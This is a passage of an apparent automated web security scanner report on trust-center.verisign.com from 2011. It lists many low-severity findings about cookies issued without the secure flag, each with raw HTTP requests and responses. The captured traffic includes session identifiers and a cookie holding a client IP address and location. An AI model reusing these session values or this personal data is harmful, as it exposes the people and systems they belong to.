Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/console_home?uid=a5f0b94a4c89f47ae217b662fc5fdac5
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


6.23. https://trust-center.verisign.com/process/retail/session_timeout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/session_timeout

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/session_timeout HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vtrh54nwcc; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=03CA6F76DB2F10DB4BFEB1847A7DDBAF

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:59:40 GMT
Server: Apache
Set-Cookie: TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Set-Cookie: JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure
Location: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


6.24. https://trust-center.verisign.com/process/retail/trust_initial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial?application_locale=VTC_US&promoCode=TSAB9999&UI=PPT HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:26:31 GMT
Server: Apache
Set-Cookie: TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_product_selector?uid=54e97416d385e356d49a079c459d836b&product=TRUSTSEAL001
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


6.25. https://trust-center.verisign.com/process/retail/trust_product_selector  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_product_selector

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 41019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...

6.26. https://trust-center.verisign.com/process/retail/trust_product_selector.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_product_selector.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector.do HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:02 GMT
Server: Apache
Set-Cookie: TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_capture_tech_contact_details?uid=25a7ccba99f4ee1a587cdec832e34e73
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


6.27. https://trust-center.verisign.com/rcm/TeaLeafTarget.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/TeaLeafTarget.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /rcm/TeaLeafTarget.html HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
Content-Length: 1103
X-TeaLeaf-Page-Objects: 0
Origin: https://trust-center.verisign.com
X-TeaLeaf-Page-Img-Fail: 1
X-TeaLeaf-Page-Render: 123
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

<ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:10 GMT
Server: Apache
Set-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 32
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<body>
OK
</body>
</html>

6.28. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/arrow_progressBar_gray.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/arrow_progressBar_gray.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 91
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a...............................!.......,.......... hs......+RR.N...}...XF.M4....1...;

6.29. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/arrow_progressBar_red.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/arrow_progressBar_red.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 90
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.........3....d.....2Y........!.......,...........(e.......RR.L...}Z..XF.M4..
.M..;

6.30. https://trust-center.verisign.com/rcm/verisign/images/divider.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/divider.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/divider.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 44
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..
..........!.......,......
........;

6.31. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/ico_questionmark.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/ico_questionmark.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 374
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.....-......8..F.#O.....I.=.2Q.Wu..:...............1Z.\}.*U..B.%K.Bh....Mn....-Q....x.....n..{..n..h}.........................x.....q...4.......................................................
...[SNIP]...

6.32. https://trust-center.verisign.com/rcm/verisign/images/logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/logo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 16073
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..=...............................................................................................................................................................................................
...[SNIP]...

6.33. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/popup_button_left.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/popup_button_left.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 348
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..................................................................................................................................................................................................
...[SNIP]...

6.34. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/popup_button_right.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/popup_button_right.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 344
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..................................................................................................................................................................................................
...[SNIP]...

6.35. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/pricebox_bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/pricebox_bg.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
